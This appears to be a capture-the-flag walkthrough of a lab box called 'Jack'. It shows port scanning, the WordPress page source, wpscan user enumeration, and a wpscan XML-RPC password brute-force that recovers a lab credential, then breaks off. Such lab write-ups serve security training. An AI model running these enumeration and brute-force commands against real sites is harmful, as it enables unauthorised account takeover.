Tag Archives: hacking

Jack

In today’s Game we are going to explore hacking into a WordPress site to obain a low privileged user access, then find credentials to pivot to a normal user on the box, and then enumerating to find some interesting things with Python which allows us to PrivEsc to Root and own this box.

Initial Enumeration

Get a rust scan:

✘ kali@kalia  ~/curr  rustscan -a $IP
[sudo] password for kali: 
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
😵 https://admin.tryhackme.com

[~] The config file is expected to be at "/home/rustscan/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 1048476'.
Open 10.10.13.248:22
Open 10.10.13.248:80
[~] Starting Script(s)
[~] Starting Nmap 7.93 ( https://nmap.org ) at 2023-11-11 23:04 UTC
Initiating Ping Scan at 23:04
Scanning 10.10.13.248 [2 ports]
Completed Ping Scan at 23:04, 0.27s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 23:04
Completed Parallel DNS resolution of 1 host. at 23:04, 0.01s elapsed
DNS resolution of 1 IPs took 0.03s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 23:04
Scanning 10.10.13.248 [2 ports]
Discovered open port 22/tcp on 10.10.13.248
Discovered open port 80/tcp on 10.10.13.248
Completed Connect Scan at 23:04, 0.28s elapsed (2 total ports)
Nmap scan report for 10.10.13.248
Host is up, received syn-ack (0.27s latency).
Scanned at 2023-11-11 23:04:00 UTC for 1s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack
80/tcp open  http    syn-ack

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.61 seconds

Looks like this is WordPress v5.3.2.

There is a robots.txt disallowed entry for wp-admin.

Now checking out the website on port 80:

and here is the source for that:

<!doctype html>
<html lang="en-US">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="profile" href="[https://gmpg.org/xfn/11](view-source:https://gmpg.org/xfn/11)">

    <title>Jack&#039;s Personal Site &#8211; Blog for Jacks writing adventures.</title>
<link rel='dns-prefetch' href='[//fonts.googleapis.com](view-source:http://fonts.googleapis.com/)' />
<link rel='dns-prefetch' href='[//s.w.org](view-source:http://s.w.org/)' />
<link rel="alternate" type="application/rss+xml" title="Jack&#039;s Personal Site &raquo; Feed" href="[http://jack.thm/index.php/feed/](view-source:http://jack.thm/index.php/feed/)" />
<link rel="alternate" type="application/rss+xml" title="Jack&#039;s Personal Site &raquo; Comments Feed" href="[http://jack.thm/index.php/comments/feed/](view-source:http://jack.thm/index.php/comments/feed/)" />
        <script type="text/javascript">
            window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/jack.thm\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.3.2"}};
            !function(e,a,t){var r,n,o,i,p=a.createElement("canvas"),s=p.getContext&&p.getContext("2d");function c(e,t){var a=String.fromCharCode;s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,e),0,0);var r=p.toDataURL();return s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,t),0,0),r===p.toDataURL()}function l(e){if(!s||!s.fillText)return!1;switch(s.textBaseline="top",s.font="600 32px Arial",e){case"flag":return!c([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])&&(!c([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!c([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]));case"emoji":return!c([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340])}return!1}function d(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(i=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},o=0;o<i.length;o++)t.supports[i[o]]=l(i[o]),t.supports.everything=t.supports.everything&&t.supports[i[o]],"flag"!==i[o]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[i[o]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(r=t.source||{}).concatemoji?d(r.concatemoji):r.wpemoji&&r.twemoji&&(d(r.twemoji),d(r.wpemoji)))}(window,document,window._wpemojiSettings);
        </script>
        <style type="text/css">
img.wp-smiley,
img.emoji {
    display: inline !important;
    border: none !important;
    box-shadow: none !important;
    height: 1em !important;
    width: 1em !important;
    margin: 0 .07em !important;
    vertical-align: -0.1em !important;
    background: none !important;
    padding: 0 !important;
}
</style>
    <link rel='stylesheet' id='wp-block-library-css'  href='[http://jack.thm/wp-includes/css/dist/block-library/style.min.css?ver=5.3.2](view-source:http://jack.thm/wp-includes/css/dist/block-library/style.min.css?ver=5.3.2)' type='text/css' media='all' />
<link rel='stylesheet' id='wp-block-library-theme-css'  href='[http://jack.thm/wp-includes/css/dist/block-library/theme.min.css?ver=5.3.2](view-source:http://jack.thm/wp-includes/css/dist/block-library/theme.min.css?ver=5.3.2)' type='text/css' media='all' />
<link rel='stylesheet' id='online-portfolio-googleapis-css'  href='[//fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i|Work+Sans:100,200,300,400,500,600,700,800,900](view-source:http://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i|Work+Sans:100,200,300,400,500,600,700,800,900)' type='text/css' media='all' />
<link rel='stylesheet' id='font-awesome-css'  href='[http://jack.thm/wp-content/themes/online-portfolio/assets/lib/font-awesome/css/all.min.css?ver=5.8.1](view-source:http://jack.thm/wp-content/themes/online-portfolio/assets/lib/font-awesome/css/all.min.css?ver=5.8.1)' type='text/css' media='all' />
<link rel='stylesheet' id='bootstrap-css'  href='[http://jack.thm/wp-content/themes/online-portfolio/assets/lib/bootstrap/css/bootstrap.min.css?ver=4.2.1](view-source:http://jack.thm/wp-content/themes/online-portfolio/assets/lib/bootstrap/css/bootstrap.min.css?ver=4.2.1)' type='text/css' media='all' />
<link rel='stylesheet' id='animate-css'  href='[http://jack.thm/wp-content/themes/online-portfolio/assets/lib/animate/animate.min.css?ver=3.5.2](view-source:http://jack.thm/wp-content/themes/online-portfolio/assets/lib/animate/animate.min.css?ver=3.5.2)' type='text/css' media='all' />
<link rel='stylesheet' id='owlcarousel-css-css'  href='[http://jack.thm/wp-content/themes/online-portfolio/assets/lib/owlcarousel/assets/owl.carousel.min.css?ver=2.2.1](view-source:http://jack.thm/wp-content/themes/online-portfolio/assets/lib/owlcarousel/assets/owl.carousel.min.css?ver=2.2.1)' type='text/css' media='all' />
<link rel='stylesheet' id='lightbox-css'  href='[http://jack.thm/wp-content/themes/online-portfolio/assets/lib/lightbox/css/lightbox.min.css?ver=2.2.1](view-source:http://jack.thm/wp-content/themes/online-portfolio/assets/lib/lightbox/css/lightbox.min.css?ver=2.2.1)' type='text/css' media='all' />
<link rel='stylesheet' id='online-portfolio-style-css'  href='[http://jack.thm/wp-content/themes/online-portfolio/style.css?ver=5.3.2](view-source:http://jack.thm/wp-content/themes/online-portfolio/style.css?ver=5.3.2)' type='text/css' media='all' />
<style id='online-portfolio-style-inline-css' type='text/css'>
.example_f , #intro .btn-get-started , .search-button button, a.btn-get-started.scrollto,.section-header h3::after,#faq #accordion .card-header .btn[aria-expanded="true"],#portfolio #portfolio-flters li:hover, #portfolio #portfolio-flters li.filter-active,#call-to-action .cta-btn:hover,.back-to-top{
           background: #e02c2c;}

    h3.entry-title a , #mobile-nav ul li.menu-active a, .footer-top a, .timeline-content a, #facts .counters span, .credits a,.side-bar1 a, a.continue-link, a.btn-get-started.scrollto.know a , .nav-menu li:hover > a, .nav-menu > .menu-active > a,#services .icon i,#services .box:hover .title a,.contact-page-content ul li .fa{

           color: #e02c2c;}
    #testimonials .owl-dot.active,.post-rating, .line > span, .service-icon div, .widget-online-portfolio-theme-counter, .portfolioFilter .current, .portfolioFilter a:hover, .paralex-btn:hover, .view-more:hover, .features-slider .owl-theme .owl-controls .owl-page.active span, .widget-online-portfolio-theme-testimonial .owl-theme .owl-controls .owl-page.active span, .read-more-background, .widget-online-portfolio-theme-testimonial, .widget-online-portfolio-theme-meetbutton, .footer-tags a:hover, .ample-inner-banner, .widget-search .search-submit:hover,  .pagination-blog .pagination > .active > a, .pagination-blog .pagination > li > a:hover, .scrollup, .widget_search .search-submit, posts-navigation .nav-previous, .posts-navigation .nav-next, .wpcf7-form input.wpcf7-submit
 {

           background-color: #e02c2c;}

    #footer .footer-top{
         background-color: #252020;}
    ..icon-box--description .fa{
         border-color: #e02c2c!important;}
    .post-rating,.line > span, .service-icon div, .widget-online-portfolio-theme-counter, .portfolioFilter .current, .portfolioFilter a:hover, .paralex-btn:hover, .view-more:hover, .features-slider .owl-theme .owl-controls .owl-page.active span, .widget-online-portfolio-theme-testimonial .owl-theme .owl-controls .owl-page.active span, .read-more-background, .widget-online-portfolio-theme-testimonial, .widget-online-portfolio-theme-meetbutton, .footer-tags a:hover, .ample-inner-banner,  .widget-search .search-submit:hover,  .pagination-blog .pagination > .active > a, .pagination-blog .pagination > li > a:hover, .scrollup ,.widget_search .search-submit ,posts-navigation .nav-previous,.posts-navigation .nav-next , .wpcf7-form input.wpcf7-submit

 {

           background-color: #e02c2c;}

    .error404 .content-area .search-form .search-submit  ,.button-course, .read-more-background:hover,a.viewcourse , .blog-event-date{
           background: #e02c2c!important;}


</style>
<link rel='stylesheet' id='online-portfolio-block-front-styles-css'  href='[http://jack.thm/wp-content/themes/online-portfolio/inc/gutenberg/gutenberg-front.css?ver=1.0](view-source:http://jack.thm/wp-content/themes/online-portfolio/inc/gutenberg/gutenberg-front.css?ver=1.0)' type='text/css' media='all' />
<script type='text/javascript' src='[http://jack.thm/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp](view-source:http://jack.thm/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp)'></script>
<script type='text/javascript' src='[http://jack.thm/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1](view-source:http://jack.thm/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1)'></script>
<script type='text/javascript' src='[http://jack.thm/wp-content/themes/online-portfolio/assets/js/theia-sticky-sidebar.js?ver=4.5.0](view-source:http://jack.thm/wp-content/themes/online-portfolio/assets/js/theia-sticky-sidebar.js?ver=4.5.0)'></script>
<link rel='https://api.w.org/' href='[http://jack.thm/index.php/wp-json/](view-source:http://jack.thm/index.php/wp-json/)' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="[http://jack.thm/xmlrpc.php?rsd](view-source:http://jack.thm/xmlrpc.php?rsd)" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="[http://jack.thm/wp-includes/wlwmanifest.xml](view-source:http://jack.thm/wp-includes/wlwmanifest.xml)" /> 
<meta name="generator" content="WordPress 5.3.2" />
<style type="text/css">.recentcomments a{display:inline !important;padding:0 !important;margin:0 !important;}</style></head>

<body class="home blog at-sticky-sidebar hfeed no-sidebar">

<div id="page" class="site">
    <a class="skip-link screen-reader-text" href="[#content](view-source:http://jack.thm/#content)">
        Skip to content</a>

<!--==========================
  Header
============================-->


<header id="header">
        <div class="main-header">
        <div class="container-fluid">

            <div id="logo" class="pull-left">
                                        <h1 class="site-title">

                            <a href="[http://jack.thm/](view-source:http://jack.thm/)" rel="home">Jack&#039;s Personal Site</a>
                        </h1>
                                            <p class="site-description">Blog for Jacks writing adventures.</p>
                                        <!-- Uncomment below if you prefer to use an image logo -->
                <!-- <a href="#intro"><img src="img/logo.png" alt="" title="" /></a>-->
            </div>

            <nav id="nav-menu-container">


            </nav><!-- #nav-menu-container -->
        </div>

    </div>
</header><!-- #header -->

<main id="main">


    <div class="inner-header-banner overlay bg-img"
         style="background-image: url(http://192.168.1.122/wp-content/uploads/2020/01/cropped-jacktypewriter.jpg);">
        <div class="container">
            <header class="section-header">

            <h3>Latest Blog</h3>



                    <div class="breadcrumbs">
                        <div class="container">
                            <div class="breadcrumb-trail breadcrumbs" arial-label="Breadcrumbs" role="navigation">
                                <ol class="breadcrumb trail-items">
                                    <li><nav role="navigation" aria-label="Breadcrumbs" class="breadcrumb-trail breadcrumbs" itemprop="breadcrumb"><h2 class="trail-browse">Browse</h2><ul class="trail-items" itemscope itemtype="http://schema.org/BreadcrumbList"><meta name="numberOfItems" content="1" /><meta name="itemListOrder" content="Ascending" /><li itemprop="itemListElement" itemscope itemtype="http://schema.org/ListItem" class="trail-item trail-end"><span itemprop="name">Home</span><meta itemprop="position" content="1" /></li></ul></nav></li>
                                </ol>
                            </div>
                        </div>
                    </div>

            </header>
        </div>
    </div>

        <div id="content" class="site-content single-ample-page">
        <div class="container  clearfix">
                            <div class="row">                   <!-- Start primary content area -->
                    <div id="primary" class="content-area">
                        <main id="main" class="site-main" role="main">


<div class="col-md-12">
    <article id="post-9"
             class="post type-post status-publish has-post-thumbnail hentry" class="post-9 post type-post status-publish format-standard hentry category-uncategorized">

        <a class="post-thumbnail" href="[#](view-source:http://jack.thm/#)" aria-hidden="true" tabindex="-1">
                    </a>

        <header class="entry-header">
            <h3 class="entry-title">
                <a href="[http://jack.thm/index.php/2020/01/10/jack-is-visiting-overlook-hotel-in-colorado-for-some-inspiration/](view-source:http://jack.thm/index.php/2020/01/10/jack-is-visiting-overlook-hotel-in-colorado-for-some-inspiration/)" rel="bookmark">Jack is visiting Overlook Hotel in Colorado for some inspiration.</a>
            </h3>
            <div class="entry-meta">
                                            <span class="posted-on">Posted on
<a href="[#](view-source:http://jack.thm/#)" rel="bookmark">
    <time class="entry-date published updated" datetime="2018-11-25T04:36:26+00:00">January 10, 2020</time>
</a>
                                            </span>
                                                <span class="byline"> by
                                                    <span class="author vcard">
                                                    <a class="url fn n"
                                                       href="[http://jack.thm/index.php/2020/01/10/jack-is-visiting-overlook-hotel-in-colorado-for-some-inspiration/](view-source:http://jack.thm/index.php/2020/01/10/jack-is-visiting-overlook-hotel-in-colorado-for-some-inspiration/)">jack</a>
                                                </span>
                                            </span>
            </div><!-- .entry-meta -->
        </header><!-- .entry-header -->

        <div class="entry-content">
            <p>    Due to my recent writer&#8217;s block, I will be taking a bit of time for my family and myself at the Overlook Hotel, don&#8217;t think this will be just a vacation, I assure you, I will be working very hard&hellip;            </p>

            <a href="[http://jack.thm/index.php/2020/01/10/jack-is-visiting-overlook-hotel-in-colorado-for-some-inspiration/](view-source:http://jack.thm/index.php/2020/01/10/jack-is-visiting-overlook-hotel-in-colorado-for-some-inspiration/)"
               class="continue-link">Continue Reading</a>

        </div><!-- .entry-content -->

    </article>
</div>

                        </main><!-- #main -->
                    </div><!-- #primary -->

                    <div id="sidebar-primary secondary" class="widget-area sidebar" role="complementary">
                        <section  class="widget ">

<aside id="secondary" class="widget-area">
    <div class="side-bar1">
        <section id="search-2" class="widget widget_search"><form action="[http://jack.thm](view-source:http://jack.thm/)" autocomplete="on" class="top-search">
    <input id="search" name="s" value="" type="text" placeholder="Search&hellip;&hellip;">
    <div class="search-button"><button type="submit">Search</button></div>
</form>
</section>        <section id="recent-posts-2" class="widget widget_recent_entries">      <h2 class="widget-title"><span>Recent Posts</span></h2>     <ul>
                                            <li>
                    <a href="[http://jack.thm/index.php/2020/01/10/jack-is-visiting-overlook-hotel-in-colorado-for-some-inspiration/](view-source:http://jack.thm/index.php/2020/01/10/jack-is-visiting-overlook-hotel-in-colorado-for-some-inspiration/)">Jack is visiting Overlook Hotel in Colorado for some inspiration.</a>
                                    </li>
                    </ul>
        </section><section id="recent-comments-2" class="widget widget_recent_comments"><h2 class="widget-title"><span>Recent Comments</span></h2><ul id="recentcomments"></ul></section><section id="archives-2" class="widget widget_archive"><h2 class="widget-title"><span>Archives</span></h2>     <ul>
                <li><a href='[http://jack.thm/index.php/2020/01/](view-source:http://jack.thm/index.php/2020/01/)'>January 2020</a></li>
        </ul>
            </section><section id="categories-2" class="widget widget_categories"><h2 class="widget-title"><span>Categories</span></h2>     <ul>
                <li class="cat-item cat-item-1"><a href="[http://jack.thm/index.php/category/uncategorized/](view-source:http://jack.thm/index.php/category/uncategorized/)">Uncategorized</a>
</li>
        </ul>
            </section><section id="meta-2" class="widget widget_meta"><h2 class="widget-title"><span>Meta</span></h2>           <ul>
                        <li><a href="[http://jack.thm/wp-login.php](view-source:http://jack.thm/wp-login.php)">Log in</a></li>
            <li><a href="[http://jack.thm/index.php/feed/](view-source:http://jack.thm/index.php/feed/)">Entries feed</a></li>
            <li><a href="[http://jack.thm/index.php/comments/feed/](view-source:http://jack.thm/index.php/comments/feed/)">Comments feed</a></li>
            <li><a href="[https://wordpress.org/](view-source:https://wordpress.org/)">WordPress.org</a></li>           </ul>
            </section>  </div>
</aside><!-- #secondary -->
                        </section>
                    </div>

                </div>
            </div>
        </div>
</main>

    <footer id="footer">



        <div class="container">
            <div class="copyright">
                &copy; Copyright All Rights Reserved 2019           </div>
            <div class="credits">
                <a href="[https://www.amplethemes.com/](view-source:https://www.amplethemes.com/)"
                > Design &amp; develop by AmpleThemes </a>
            </div>
        </div>
    </footer><!-- #footer -->

    <a href="[#](view-source:http://jack.thm/#)" class="back-to-top"><i class="fas fa-chevron-up"></i></a>
    <script type='text/javascript' src='[http://jack.thm/wp-content/themes/online-portfolio/assets/lib/bootstrap/js/bootstrap.bundle.min.js?ver=4.2.1](view-source:http://jack.thm/wp-content/themes/online-portfolio/assets/lib/bootstrap/js/bootstrap.bundle.min.js?ver=4.2.1)'></script>
<script type='text/javascript' src='[http://jack.thm/wp-content/themes/online-portfolio/assets/lib/easing/easing.min.js?ver=4.2.1](view-source:http://jack.thm/wp-content/themes/online-portfolio/assets/lib/easing/easing.min.js?ver=4.2.1)'></script>
<script type='text/javascript' src='[http://jack.thm/wp-includes/js/hoverIntent.min.js?ver=1.8.1](view-source:http://jack.thm/wp-includes/js/hoverIntent.min.js?ver=1.8.1)'></script>
<script type='text/javascript' src='[http://jack.thm/wp-content/themes/online-portfolio/assets/lib/superfish/superfish.js?ver=4.2.1](view-source:http://jack.thm/wp-content/themes/online-portfolio/assets/lib/superfish/superfish.js?ver=4.2.1)'></script>
<script type='text/javascript' src='[http://jack.thm/wp-content/themes/online-portfolio/assets/lib/wow/wow.min.js?ver=4.2.1](view-source:http://jack.thm/wp-content/themes/online-portfolio/assets/lib/wow/wow.min.js?ver=4.2.1)'></script>
<script type='text/javascript' src='[http://jack.thm/wp-content/themes/online-portfolio/assets/lib/waypoints/waypoints.min.js?ver=4.2.1](view-source:http://jack.thm/wp-content/themes/online-portfolio/assets/lib/waypoints/waypoints.min.js?ver=4.2.1)'></script>
<script type='text/javascript' src='[http://jack.thm/wp-content/themes/online-portfolio/assets/lib/counterup/counterup.min.js?ver=4.2.1](view-source:http://jack.thm/wp-content/themes/online-portfolio/assets/lib/counterup/counterup.min.js?ver=4.2.1)'></script>
<script type='text/javascript' src='[http://jack.thm/wp-content/themes/online-portfolio/assets/lib/owlcarousel/owl.carousel.min.js?ver=4.2.1](view-source:http://jack.thm/wp-content/themes/online-portfolio/assets/lib/owlcarousel/owl.carousel.min.js?ver=4.2.1)'></script>
<script type='text/javascript' src='[http://jack.thm/wp-content/themes/online-portfolio/assets/lib/isotope/isotope.pkgd.min.js?ver=4.2.1](view-source:http://jack.thm/wp-content/themes/online-portfolio/assets/lib/isotope/isotope.pkgd.min.js?ver=4.2.1)'></script>
<script type='text/javascript' src='[http://jack.thm/wp-content/themes/online-portfolio/assets/lib/lightbox/js/lightbox.min.js?ver=4.2.1](view-source:http://jack.thm/wp-content/themes/online-portfolio/assets/lib/lightbox/js/lightbox.min.js?ver=4.2.1)'></script>
<script type='text/javascript' src='[http://jack.thm/wp-content/themes/online-portfolio/assets/lib/touchSwipe/jquery.touchSwipe.min.js?ver=4.2.1](view-source:http://jack.thm/wp-content/themes/online-portfolio/assets/lib/touchSwipe/jquery.touchSwipe.min.js?ver=4.2.1)'></script>
<script type='text/javascript' src='[http://jack.thm/wp-content/themes/online-portfolio/assets/js/main.js?ver=1.0.5](view-source:http://jack.thm/wp-content/themes/online-portfolio/assets/js/main.js?ver=1.0.5)'></script>
<script type='text/javascript' src='[http://jack.thm/wp-includes/js/wp-embed.min.js?ver=5.3.2](view-source:http://jack.thm/wp-includes/js/wp-embed.min.js?ver=5.3.2)'></script>
</div>

    </body>
    </html>

Now further enumerating the wordpress site. I see a possible username ‘jack’ as the owner of this post.

Let me get a wpscan going.

 ✘ kali@kalia  ~/curr  wpscan -e u,ap --url http://jack.thm                                                       
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://jack.thm/ [10.10.13.248]
[+] Started: Sun Nov 12 08:30:35 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://jack.thm/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://jack.thm/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://jack.thm/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://jack.thm/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://jack.thm/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.3.2 identified (Insecure, released on 2019-12-18).
 | Found By: Rss Generator (Passive Detection)
 |  - http://jack.thm/index.php/feed/, <generator>https://wordpress.org/?v=5.3.2</generator>
 |  - http://jack.thm/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.3.2</generator>

[+] WordPress theme in use: online-portfolio
 | Location: http://jack.thm/wp-content/themes/online-portfolio/
 | Last Updated: 2021-07-30T00:00:00.000Z
 | Readme: http://jack.thm/wp-content/themes/online-portfolio/readme.txt
 | [!] The version is out of date, the latest version is 0.1.0
 | Style URL: http://jack.thm/wp-content/themes/online-portfolio/style.css?ver=5.3.2
 | Style Name: Online Portfolio
 | Style URI: https://www.amplethemes.com/downloads/online-protfolio/
 | Description: Online Portfolio WordPress portfolio theme for building personal website. You can take full advantag...
 | Author: Ample Themes
 | Author URI: https://amplethemes.com/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 | Confirmed By: Css Style In 404 Page (Passive Detection)
 |
 | Version: 0.0.7 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://jack.thm/wp-content/themes/online-portfolio/style.css?ver=5.3.2, Match: 'Version: 0.0.7'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:02 <==============================================> (10 / 10) 100.00% Time: 00:00:02

[i] User(s) Identified:

[+] jack
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://jack.thm/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] wendy
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] danny
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sun Nov 12 08:30:55 2023
[+] Requests Done: 59
[+] Cached Requests: 9
[+] Data Sent: 14.86 KB
[+] Data Received: 371.931 KB
[+] Memory used: 242.645 MB
[+] Elapsed time: 00:00:20

I see it found a few interesting things.

I made a users.txt file with the 3 users and then run a brute-force password scan on those 3:

 kali@kalia  ~/curr  wpscan --url http://jack.thm/ -t 3 -U users.txt --passwords toplikeymunged.txt     
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://jack.thm/ [10.10.13.248]
[+] Started: Sun Nov 12 09:42:00 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://jack.thm/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://jack.thm/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://jack.thm/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://jack.thm/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://jack.thm/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.3.2 identified (Insecure, released on 2019-12-18).
 | Found By: Rss Generator (Passive Detection)
 |  - http://jack.thm/index.php/feed/, <generator>https://wordpress.org/?v=5.3.2</generator>
 |  - http://jack.thm/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.3.2</generator>

[+] WordPress theme in use: online-portfolio
 | Location: http://jack.thm/wp-content/themes/online-portfolio/
 | Last Updated: 2021-07-30T00:00:00.000Z
 | Readme: http://jack.thm/wp-content/themes/online-portfolio/readme.txt
 | [!] The version is out of date, the latest version is 0.1.0
 | Style URL: http://jack.thm/wp-content/themes/online-portfolio/style.css?ver=5.3.2
 | Style Name: Online Portfolio
 | Style URI: https://www.amplethemes.com/downloads/online-protfolio/
 | Description: Online Portfolio WordPress portfolio theme for building personal website. You can take full advantag...
 | Author: Ample Themes
 | Author URI: https://amplethemes.com/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 | Confirmed By: Css Style In 404 Page (Passive Detection)
 |
 | Version: 0.0.7 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://jack.thm/wp-content/themes/online-portfolio/style.css?ver=5.3.2, Match: 'Version: 0.0.7'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:14 <=============================================> (137 / 137) 100.00% Time: 00:00:14

[i] No Config Backups Found.

[+] Performing password attack on Xmlrpc against 3 user/s
[SUCCESS] - wendy / changelater                                                                                             
Trying danny / starwars Time: 00:02:06 <====================================             > (645 / 867) 74.39%  ETA: ??:??:??

[!] Valid Combinations Found:
